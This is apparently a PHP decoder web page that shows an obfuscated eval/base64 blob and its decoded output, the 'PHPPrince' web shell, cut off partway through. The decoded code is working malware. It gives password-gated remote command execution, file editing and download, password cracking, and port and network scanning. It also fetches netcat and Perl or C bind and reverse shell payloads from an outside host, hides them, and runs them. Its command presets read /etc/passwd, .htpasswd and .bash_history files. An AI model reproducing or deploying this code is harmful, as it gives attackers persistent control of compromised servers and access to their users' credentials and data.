Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode("7b1pe9s4sij8+czzzH9gOJpQmlCy5CWLFCrj2E7Hp70dy+mcuUm..

Decoded Output download

<?php ?><?php
#--Config--#
$login_password = 'ssh'; #Login password
$IP = array(); #Allowed users [$IP=array('192.168.100.5','192.168.100.9');]
#----------#
error_reporting(0);
ignore_user_abort(true);
set_time_limit(0);
ini_set('max_execution_time', '0');
ini_set('memory_limit', '9999M');
ini_set('output_buffering', 0);
set_magic_quotes_runtime(0);
if (!isset($_SERVER)) $_SERVER = & $HTTP_SERVER_VARS;
if (!isset($_POST)) $_POST = & $HTTP_POST_VARS;
if (!isset($_GET)) $_GET = & $HTTP_GET_VARS;
if (!isset($_COOKIE)) $_COOKIE = & $HTTP_COOKIE_VARS;
if (!isset($_FILES)) $_FILES = & $HTTP_POST_FILES;
$_REQUEST = array_merge($_GET, $_POST);
if (get_magic_quotes_gpc()) {
    foreach ($_REQUEST as $key => $value) $_REQUEST[$key] = stripslashes($value);
}
if (count($IP) && !in_array($_SERVER['REMOTE_ADDR'], $IP)) die('Access denied!');
function hlinK($str = '') {
    $myvars = array('modE', 'chmoD', 'workingdiR', 'urL', 'cracK', 'imagE', 'namE', 'filE', 'downloaD', 'seC', 'cP', 'mV', 'rN', 'deL');
    $ret = $_SERVER['PHP_SELF'] . '?';
    $new = explode('&', $str);
    foreach ($_GET as $key => $v) {
        $add = 1;
        foreach ($new as $m) {
            $el = explode('=', $m);
            if ($el[0] == $key) $add = 0;
        }
        if ($add) {
            if (!in_array($key, $myvars)) $ret.= "$key=$v&";
        }
    }
    $ret.= $str;
    return $ret;
}
header('Cache-Control: no-cache, must-revalidate');
header('Expires: Mon, 7 Aug 1987 05:00:00 GMT');
$et = '</td></tr></table>';
if (!empty($login_password)) {
    if (!empty($_REQUEST['fpassw'])) {
        if ($_REQUEST['fpassw'] == $login_password) setcookie('passw', md5($_REQUEST['fpassw']));
        header('Location: ' . hlinK());
    }
    if (empty($_COOKIE['passw']) || $_COOKIE['passw'] != md5($login_password)) die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></form>$et</body></html>");
}
if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
$disablefunctions = ini_get('disable_functions');
$disablefunctions = explode(',', $disablefunctions);
function checkthisporT($ip, $port, $timeout, $type = 0) {
    if (!$type) {
        $scan = fsockopen($ip, $port, $n, $s, $timeout);
        if ($scan) {
            fclose($scan);
            return 1;
        }
    } elseif (function_exists('socket_set_timeout')) {
        $scan = fsockopen("udp://$ip", $port);
        if ($scan) {
            socket_set_timeout($scan, $timeout);
            fwrite($scan, "");
            $s = time();
            fread($scan, 1);
            if ((time() - $s) >= $timeout) {
                fclose($scan);
                return 1;
            }
        }
    }
    return 0;
}
if (!function_exists('is_executable')) {
    function is_executable($addr) {
        return 0;
    }
}
if (!function_exists('file_get_contents')) {
    function file_get_contents($addr) {
        $a = fopen($addr, 'r');
        $tmp = fread($a, filesize($a));
        fclose($a);
        if ($a) return $tmp;
        else return null;
    }
}
if (!function_exists('file_put_contents')) {
    function file_put_contents($addr, $con) {
        $a = fopen($addr, 'w');
        if (!$a) return 0;
        $t = fwrite($a, $con);
        fclose($a);
        if ($t) return strlen($con);
        return 0;
    }
}
function file_add_contentS($addr, $con) {
    $a = fopen($addr, 'a');
    if (!$a) return 0;
    fwrite($a, $con);
    fclose($a);
    return strlen($con);
}
if (!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE'])) chmod($_REQUEST['chmoD'], '0' . $_REQUEST['modE']);
if (!empty($_REQUEST['downloaD'])) {
    ob_clean();
    $dl = $_REQUEST['downloaD'];
    $con = file_get_contents($dl);
    header('Content-type: application/octet-stream');
    header("Content-disposition: attachment; filename=\"$dl\";");
    header('Content-length: ' . strlen($con));
    echo $con;
    exit;
}
if (!empty($_REQUEST['imagE'])) {
    $img = $_REQUEST['imagE'];
    header('Content-type: imagE/gif');
    header("Content-length: " . filesize($img));
    header("Last-Modified: " . date('r', filemtime($img)));
    echo file_get_contents($img);
    exit;
}
if (!empty($_REQUEST['exT'])) {
    $ex = $_REQUEST['exT'];
    $e = get_extension_funcs($ex);
    echo '<html><head><title>' . htmlspecialchars($ex) . '</title></head><body><b>Functions:</b><br>';
    foreach ($e as $k => $f) {
        $i = $k + 1;
        echo "$i)$f ";
        if (in_array($f, $disablefunctions)) echo '<font color=red>DISABLED</font>';
        echo '<br>';
    }
    echo '</body></html>';
    exit;
}
function showsizE($size) {
    if ($size >= 1073741824) $size = round(($size / 1073741824), 2) . ' GB';
    elseif ($size >= 1048576) $size = round(($size / 1048576), 2) . ' MB';
    elseif ($size >= 1024) $size = round(($size / 1024), 2) . ' KB';
    else $size.= ' B';
    return $size;
}
$windows = (substr((strtoupper(php_uname())), 0, 3) == 'WIN') ? 1 : 0;
$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td><b>Error: </b>";
$v = '1.9';
$cwd = getcwd();
$msgbox = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td align='center'>";
$intro = "<center><table border=0 style='border-collapse: collapse'><tr><td bgcolor='#666666'><b>Script:</b><br>" . str_repeat('-=-', 25) . "<br><b>Name:</b> PHPPrince<br><b>Version:</b> $v<br><br><b>Author:</b><br>" . str_repeat('-=-', 25) . "<br><b>Name:</b> Prince<br><b>Country:</b> Romania<br><b>Website:</b> <a href='http://kkt.at.ua/' target='_blank'>http://kkt.at.ua/</a><br><b>Email:</b> <a href='mailto:[email protected]?subject=PHPPrince'>[email protected]</a><br><noscript>" . str_repeat('-=-', 25) . "<br><b>Error: Enable JavaScript in your browser!!!</b></noscript>$et</center>";
$footer = "${msgbox}PHPPrince v$v - Powered By <a href='Prince' target='_blank'>Prince</a>$et";
$hcwd = "<input type=hidden name=workingdiR value='$cwd'>";
$t = "<table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#333333'>";
$crack = "</td><td bgcolor='#333333'></td></tr><form method='POST' name=form><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
function checkfunctioN($func) {
    global $disablefunctions, $safemode;
    $safe = array('passthru', 'system', 'exec', 'shell_exec', 'popen', 'proc_open');
    if ($safemode == 'ON' && in_array($func, $safe)) return 0;
    elseif (function_exists($func) && is_callable($func) && !in_array($func, $disablefunctions)) return 1;
    return 0;
}
function whereistmP() {
    $uploadtmp = ini_get('upload_tmp_dir');
    $uf = getenv('USERPROFILE');
    $af = getenv('ALLUSERSPROFILE');
    $se = ini_get('session.save_path');
    $envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
    if (is_dir('/tmp') && is_writable('/tmp')) return '/tmp';
    if (is_dir('/usr/tmp') && is_writable('/usr/tmp')) return '/usr/tmp';
    if (is_dir('/var/tmp') && is_writable('/var/tmp')) return '/var/tmp';
    if (is_dir($uf) && is_writable($uf)) return $uf;
    if (is_dir($af) && is_writable($af)) return $af;
    if (is_dir($se) && is_writable($se)) return $se;
    if (is_dir($uploadtmp) && is_writable($uploadtmp)) return $uploadtmp;
    if (is_dir($envtmp) && is_writable($envtmp)) return $envtmp;
    return '.';
}
function shelL($command) {
    global $windows;
    $exec = $output = '';
    $dep[] = array('pipe', 'r');
    $dep[] = array('pipe', 'w');
    if (checkfunctioN('passthru')) {
        ob_start();
        passthru($command);
        $exec = ob_get_contents();
        ob_clean();
        ob_end_clean();
    } elseif (checkfunctioN('system')) {
        $tmp = ob_get_contents();
        ob_clean();
        system($command);
        $output = ob_get_contents();
        ob_clean();
        $exec = $tmp;
    } elseif (checkfunctioN('exec')) {
        exec($command, $output);
        $output = join("
", $output);
        $exec = $output;
    } elseif (checkfunctioN('shell_exec')) $exec = shell_exec($command);
    elseif (checkfunctioN('popen')) {
        $output = popen($command, 'r');
        while (!feof($output)) {
            $exec = fgets($output);
        }
        pclose($output);
    } elseif (checkfunctioN('proc_open')) {
        $res = proc_open($command, $dep, $pipes);
        while (!feof($pipes[1])) {
            $line = fgets($pipes[1]);
            $output.= $line;
        }
        $exec = $output;
        proc_close($res);
    } elseif (checkfunctioN('win_shell_execute')) $exec = winshelL($command);
    elseif (checkfunctioN('win32_create_service')) $exec = srvshelL($command);
    elseif (extension_loaded('ffi') && $windows) $exec = ffishelL($command);
    elseif (is_object($ws = new COM('WScript.Shell'))) $exec = comshelL($command, $ws);
    elseif (extension_loaded('perl')) $exec = perlshelL($command);
    return $exec;
}
function getiT($get) {
    $fo = strtolower(ini_get('allow_url_fopen'));
    $ui = strtolower(ini_get('allow_url_include'));
    if ($fo || $fo == 'on') $con = file_get_contents($get);
    elseif ($ui || $ui == 'on') {
        ob_start();
        include ($get);
        $con = ob_get_contents();
        ob_end_clean();
    } else {
        $u = parse_url($get);
        $host = $u['host'];
        $file = (empty($u['path'])) ? '/' : $u['path'];
        $port = (empty($u['port'])) ? 80 : $u['port'];
        $url = fsockopen($host, $port, $en, $es, 12);
        fputs($url, "GET $file HTTP/1.0
Accept-Encoding: text
Host: $host
Referer: $host
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)

");
        $tmp = $con = '';
        while ($tmp != "
") $tmp = fgets($url);
        while (!feof($url)) $con.= fgets($url);
    }
    return $con;
}
function downloadiT($get, $put) {
    $con = getiT($get);
    $mk = file_put_contents($put, $con);
    if ($mk) return 1;
    return 0;
}
function winshelL($command) {
    $name = whereistmP() . "\".uniqid('NJ');
win_shell_execute('cmd.exe',''," / C $command > \"$name\"");
    sleep(1);
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}
function ffishelL($command) {
    $name = whereistmP() . "\".uniqid('NJ');
$api=new ffi("[lib = 'kernel32.dll']intWinExec(char * APP, intSW);
    ");
$res=$api->WinExec("cmd . exe / c $command > \"$name\"", 0);
    while (!file_exists($name)) sleep(1);
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}
function srvshelL($command) {
    $name = whereistmP() . "\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\windows\system32\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>" / c $command > \"$name\""));
    win32_start_service($n);
    win32_stop_service($n);
    win32_delete_service($n);
    while (!file_exists($name)) sleep(1);
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}
function comshelL($command, $ws) {
    $exec = $ws->exec("cmd.exe /c $command");
    $so = $exec->StdOut();
    return $so->ReadAll();
}
function perlshelL($command) {
    $perl = new perl();
    ob_start();
    $perl->eval("system('$command')");
    $exec = ob_get_contents();
    ob_end_clean();
    return $exec;
}
function smtpchecK($addr, $user, $pass, $timeout) {
    $sock = fsockopen($addr, 25, $n, $s, $timeout);
    if (!$sock) return -1;
    fread($sock, 1024);
    fputs($sock, 'ehlo ' . uniqid('NJ') . "
");
    $res = substr(fgets($sock, 512), 0, 1);
    if ($res != '2') return 0;
    fgets($sock, 512);
    fgets($sock, 512);
    fgets($sock, 512);
    fputs($sock, "AUTH LOGIN
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '334') return 0;
    fputs($sock, base64_encode($user) . "
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '334') return 0;
    fputs($sock, base64_encode($pass) . "
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '235') return 0;
    return 1;
}
function mysqlchecK($host, $user, $pass, $timeout) {
    if (function_exists('mysql_connect')) {
        $l = mysql_connect($host, $user, $pass);
        if ($l) return 1;
    }
    return 0;
}
function mssqlchecK($host, $user, $pass, $timeout) {
    if (function_exists('mssql_connect')) {
        $l = mssql_connect($host, $user, $pass);
        if ($l) return 1;
    }
    return 0;
}
function checksmtP($host, $timeout) {
    $from = strtolower(uniqid('nj')) . '@' . strtolower(uniqid('nj')) . '.com';
    $sock = fsockopen($host, 25, $n, $s, $timeout);
    if (!$sock) return -1;
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '220') return 0;
    fputs($sock, 'HELO ' . uniqid('NJ') . "
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '250') return 0;
    fputs($sock, "MAIL FROM: <$from>
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '250') return 0;
    fputs($sock, "RCPT TO: <[email protected]>
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '250') return 0;
    fputs($sock, "DATA
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '354') return 0;
    fputs($sock, "From: " . uniqid('NJ') . " " . uniqid('NJ') . " <$from>
Subject: " . uniqid('NJ') . "
MIME-Version: 1.0
Content-Type: text/plain;

" . uniqid('Hello ', true) . "
.
");
    $res = substr(fgets($sock, 512), 0, 3);
    if ($res != '250') return 0;
    return 1;
}
function replace_stR($s, $h) {
    $ret = $h;
    foreach ($s as $k => $r) $ret = str_replace($k, $r, $ret);
    return $ret;
}
function check_urL($url, $method, $search = '200', $timeout = 3) {
    $u = parse_url($url);
    $method = strtoupper($method);
    $host = $u['host'];
    $file = (!empty($u['path'])) ? $u['path'] : '/';
    $port = (empty($u['port'])) ? 80 : $u['port'];
    $data = (!empty($u['query'])) ? $u['query'] : '';
    if (!empty($data)) $data = "?$data";
    $sock = fsockopen($host, $port, $en, $es, $timeout);
    if ($sock) {
        fputs($sock, "$method $file$data HTTP/1.0
");
        fputs($sock, "Host: $host
");
        if ($method == 'GET') fputs($sock, "
");
        elseif ($method == 'POST') fputs($sock, 'Content-Type: application/x-www-form-urlencoded
Content-length: ' . strlen($data) . "
Accept-Encoding: text
Connection: close

$data");
        else return 0;
        if ($search == '200') if (strstr(fgets($sock), '200')) {
            fclose($sock);
            return 1;
        } else {
            fclose($sock);
            return 0;
        }
        while (!feof($sock)) {
            $res = fgets($sock);
            if (!empty($res)) if (strstr($res, $search)) {
                fclose($sock);
                return 1;
            }
        }
        fclose($sock);
    }
    return 0;
}
function get_sw_namE($host, $timeout) {
    $sock = fsockopen($host, 80, $en, $es, $timeout);
    if ($sock) {
        $page = uniqid('NJ');
        fputs($sock, "GET /$page HTTP/1.0

");
        while (!feof($sock)) {
            $con = fgets($sock);
            if (strstr($con, 'Server:')) {
                $ser = substr($con, strpos($con, ' ') + 1);
                return $ser;
            }
        }
        fclose($sock);
        return -1;
    }
    return 0;
}
function snmpchecK($ip, $com, $timeout) {
    $res = 0;
    $n = chr(0x00);
    $packet = chr(0x30) . chr(0x26) . chr(0x02) . chr(0x01) . chr(0x00) . chr(0x04) . chr(strlen($com)) . $com . chr(0xA0) . chr(0x19) . chr(0x02) . chr(0x01) . chr(0x01) . chr(0x02) . chr(0x01) . $n . chr(0x02) . chr(0x01) . $n . chr(0x30) . chr(0x0E) . chr(0x30) . chr(0x0C) . chr(0x06) . chr(0x08) . chr(0x2B) . chr(0x06) . chr(0x01) . chr(0x02) . chr(0x01) . chr(0x01) . chr(0x01) . $n . chr(0x05) . $n;
    $sock = fsockopen("udp://$ip", 161);
    if (function_exists('socket_set_timeout')) socket_set_timeout($sock, $timeout);
    fputs($sock, $packet);
    socket_set_timeout($sock, $timeout);
    $res = fgets($sock);
    fclose($sock);
    if ($res != '') return 1;
    else return 0;
}
$safemode = (ini_get('safe_mode') || strtolower(ini_get('safe_mode')) == 'on') ? 'ON' : 'OFF';
if ($safemode == 'ON') {
    ini_restore('safe_mode');
    ini_restore('open_basedir');
}
function brshelL() {
    global $errorbox, $windows, $et, $hcwd;
    $_REQUEST['C'] = (isset($_REQUEST['C'])) ? $_REQUEST['C'] : 0;
    $addr = 'http://kkt.at.ua/br';
    $error = "$errorbox Can not make backdoor file, go to writeable folder.$et";
    $n = uniqid('NJ_');
    if (!$windows) $n = ".$n";
    $d = whereistmP();
    $name = $d . DIRECTORY_SEPARATOR . $n;
    $c = ($_REQUEST['C']) ? 1 : 0;
    if (!empty($_REQUEST['port']) && ($_REQUEST['port'] <= 65535) && ($_REQUEST['port'] >= 1)) {
        $port = (int)$_REQUEST['port'];
        if ($windows) {
            if ($c) {
                $name.= '.exe';
                $bd = downloadiT("$addr/nc", $name);
                shelL("attrib +H $name");
                if (!$bd) echo $error;
                else shelL("$name -L -p $port -e cmd.exe");
            } else {
                $name = $name . '.pl';
                $bd = downloadiT("$addr/winbind.p", $name);
                shelL("attrib +H $name");
                if (!$bd) echo $error;
                else shelL("perl $name $port");
            }
        } else {
            if ($c) {
                $bd = downloadiT("$addr/bind.c", $name);
                if (!$bd) echo $error;
                else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
            } else {
                $bd = downloadiT("$addr/bind.p", $name);
                if (!$bd) echo $error;
                else shelL("cd $d;perl $n $port &");
                echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
            }
        }
    } elseif (!empty($_REQUEST['rport']) && ($_REQUEST['rport'] <= 65535) && ($_REQUEST['rport'] >= 1) && !empty($_REQUEST['ip'])) {
        $ip = $_REQUEST['ip'];
        $port = (int)$_REQUEST['rport'];
        if ($windows) {
            if ($c) {
                $name.= '.exe';
                $bd = downloadiT("$addr/nc", $name);
                shelL("attrib +H $name");
                if (!$bd) echo $error;
                else shelL("$name $ip $port -e cmd.exe");
            } else {
                $name = $name . '.pl';
                $bd = downloadiT("$addr/winrc.p", $name);
                shelL("attrib +H $name");
                if (!$bd) echo $error;
                else shelL("perl.exe $name $ip $port");
            }
        } else {
            if ($c) {
                $bd = downloadiT("$addr/rc.c", $name);
                if (!$bd) echo $error;
                else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
            } else {
                $bd = downloadiT("$addr/rc.p", $name);
                if (!$bd) echo $error;
                else shelL("cd $d;perl $n $ip $port &");
            }
        }
        echo '<font color=blue>Done!</font>';
    } else {
        echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='50%' bgcolor='#333333'>Bind shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=port value=55501 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";
        if ($windows) echo 'EXE';
        else echo 'C';
        echo "</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input type=submit class=buttons value=Bind></form>$et</td><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='40%' bgcolor='#333333'>Reverse shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#808080'>IP:</td><td bgcolor='#808080'><input type=text name=ip value=";
        echo $_SERVER['REMOTE_ADDR'];
        echo " size=17></td></tr><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=rport value=53 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";
        if ($windows) echo 'EXE';
        else echo 'C';
        echo "</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et$et";
    }
}
function showimagE($img) {
    echo "<center><img border=0 src='" . hlinK("imagE=$img&&workingdiR=" . getcwd()) . "'></center>";
}
function editoR($file) {
    global $errorbox, $et, $hcwd, $cwd;
    if (is_file($file)) {
        if (!is_readable($file)) {
            echo "$errorbox File is not readable$et<br>";
        }
        if (!is_writeable($file)) {
            echo "$errorbox File is not writeable$et<br>";
        }
        $data = file_get_contents($file);
        echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'>$hcwd<input type=text value='" . htmlspecialchars($file) . "' size=75 name=file><input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='64'>";
        echo htmlspecialchars($data);
        echo "</textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$file' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
    } else {
        echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'><input type=text value='$cwd' size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='63'></textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$cwd' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
    }
    echo "$hcwd<input type=submit class=buttons name=Save value=Save></form>$et</center>";
}
function webshelL() {
    global $windows, $hcwd, $et, $cwd;
    if ($windows) {
        $alias = "<option value='netstat -an'>Display open ports</option><option value='tasklist'>List of processes</option><option value='systeminfo'>System information</option><option value='ipconfig /all'>IP configuration</option><option value='getmac'>Get MAC address</option><option value='net start'>Services list</option><option value='net view'>Machines in domain</option><option value='net user'>Users list</option><option value='shutdown -s -f -t 1'>Turn off the server</option>";
    } else {
        $alias = "<option value='netstat -an | grep -i listen'>Display open ports</option><option value='last -a -n 250 -i'>Show last 250 logged in users</option><option value='which wget curl lynx w3m'>Downloaders</option><option value='find / -perm -2 -type d -print'>Find world-writable directories</option><option value='find . -perm -2 -type d -print'>Find world-writable directories(in current directory)</option><option value='find / -perm -2 -type f -print'>Find world-writable files</option><option value='find . -perm -2 -type f -print'>Find world-writable files(in current directory)</option><option value='find / -type f -perm 04000 -ls'>Find files with SUID bit set</option><option value='find / -type f -perm 02000 -ls'>Find files with SGID bit set</option><option value='find / -name .htpasswd -type f'>Find .htpasswd files</option><option value='find / -type f -name .bash_history'>Find .bash_history files</option><option value='cat /etc/syslog.conf'>View syslog.conf</option><option value='cat cat /etc/hosts'>View hosts</option><option value='ps auxw'>List of processes</option>";
        if (is_dir('/etc/valiases')) $alias.= "<option value='ls -l /etc/valiases'>List of cPanel`s domains(valiases)</option>";
        if (is_dir('/etc/vdomainaliases')) $alias.= "<option value='ls -l /etc/vdomainaliases'>List cPanel`s domains(vdomainaliases)</option>";
        if (file_exists('/var/cpanel/accounting.log')) $alias.= "<option value='cat /var/cpanel/accounting.log'>Display cPanel`s log</option>";
        if (is_dir('/var/spool/mail/')) $alias.= "<option value='ls /var/spool/mail/'>Mailboxes list</option>";
    }
    echo "<center><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><form method='POST'><tr><td width='20%'><b>Location:</b><input type=text name=workingdiR size=82 value='$cwd'><input class=buttons type=submit value=Change></form>$et<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><tr><td><b>Web Shell:</b></td></tr><td bgcolor='#666666'><textarea rows='23' cols='79'>";
    if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
    echo "</textarea></td></tr><form method=post><tr><td bgcolor='#808080'><input type=text size=91 name=cmd value='";
    if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));
    elseif (!$windows) echo "cat /etc/passwd";
    echo "'>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor='#808080'><select name='cmd' width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></form>$et</table><center>";
}
function maileR() {
    global $msgbox, $et, $hcwd;
    if (!empty($_REQUEST['subject']) && !empty($_REQUEST['body']) && !empty($_REQUEST['from']) && !empty($_REQUEST['to'])) {
        $to = $_REQUEST['to'];
        $from = $_REQUEST['from'];
        $subject = $_REQUEST['subject'];
        $body = $_REQUEST['body'];
        if (mail($to, $subject, $body, "From: $from")) echo "$msgbox<b>Mail sent!</b><br>$et";
    }
    echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'><td><b>Mailer:</b></td></tr><td width='20%' bgcolor='#666666'>SMTP</td><td bgcolor='#666666'>" . ini_get('SMTP') . ' (' . ini_get('smtp_port') . ")</td></tr><tr><td bgcolor='#808080'>From:</td><td bgcolor='#808080'><input name=from type=text value='[email protected]' size=55>$hcwd</td><tr><td width='25%' bgcolor='#666666'>To:</td><td bgcolor='#666666'><input name=to type=text value='";
    if (!empty($_ENV['SERVER_ADMIN'])) echo $_ENV['SERVER_ADMIN'];
    else echo '[email protected]' . getenv('HTTP_HOST');
    echo "' size=55></td></tr><tr><td bgcolor='#808080'>Subject:</td><td bgcolor='#808080'><input name=subject type=text value='' size=55></td><tr><td bgcolor='#666666'>Body:</td><td bgcolor='#666666'><textarea rows='18' cols='43' name=body></textarea></td></tr><tr><td width='10%' bgcolor='#808080'></td><td bgcolor='#808080' align='right'><input type=submit class=buttons value=Send></form>$et";
}
function scanneR() {
    global $hcwd, $et;
    if (!empty($_SERVER['SERVER_ADDR'])) $host = $_SERVER['SERVER_ADDR'];
    else $host = '127.0.0.1';
    $udp = (empty($_REQUEST['udp'])) ? 0 : 1;
    $tcp = (empty($_REQUEST['tcp'])) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        $target = $_REQUEST['target'];
        $from = (int)$_REQUEST['fromport'];
        $to = (int)$_REQUEST['toport'];
        $timeout = (int)$_REQUEST['timeout'];
        $nu = 0;
        echo '<font color=blue>Port scanning started against ' . htmlspecialchars($target) . ':<br>';
        $start = time();
        for ($i = $from;$i <= $to;$i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'tcp')) $ser = '(' . getservbyport($i, 'tcp') . ')';
                    echo "$nu) $i $ser (<a href='telnet://$target:$i'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) if (checkthisporT($target, $i, $timeout, 1)) {
                $nu++;
                $ser = '';
                if (getservbyport($i, 'udp')) $ser = '(' . getservbyport($i, 'udp') . ')';
                echo "$nu) $i $ser [UDP]<br>";
            }
        }
        $time = time() - $start;
        echo "Done! ($time seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        echo '<font color=blue>';
        $start = time();
        $from = $_REQUEST['from'];
        $to = (int)$_REQUEST['to'];
        $timeout = (int)$_REQUEST['timeout'];
        $f = substr($from, strrpos($from, '.') + 1);
        $from = substr($from, 0, strrpos($from, '.'));
        if (!empty($_REQUEST['httpscanner'])) {
            echo 'Loading webserver bug list...';
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . uniqid('BL');
            $dl = downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                $file = file($buglist);
                echo 'Done! scanning started.<br><br>';
            } else echo 'Failed!!! scanning started without webserver security testing...<br><br>';
        } else {
            $fr = htmlspecialchars($from);
            echo "Scanning $fr.$f-$fr.$to:<br><br>";
        }
        for ($i = $f;$i <= $to;$i++) {
            $output = 0;
            $ip = "$from.$i";
            if (!empty($_REQUEST['nslookup'])) {
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) echo "$ip [$hn]<br>";
                $output = 1;
            }
            if (!empty($_REQUEST['ipscanner'])) {
                $port = $_REQUEST['port'];
                if (strstr($port, ',')) $p = explode(',', $port);
                else $p[0] = $port;
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        if ($ser = getservbyport($po, 'tcp')) $ser = "($ser)";
                        $open.= " $po$ser ";
                    }
                }
                if ($open) {
                    echo "$ip) Open ports:$open<br>";
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "$ip) Webserver software: ";
                    if ($res == - 1) echo 'Unknow';
                    else echo $res;
                    echo '<br>';
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    $admin = array('/admin/', '/adm/');
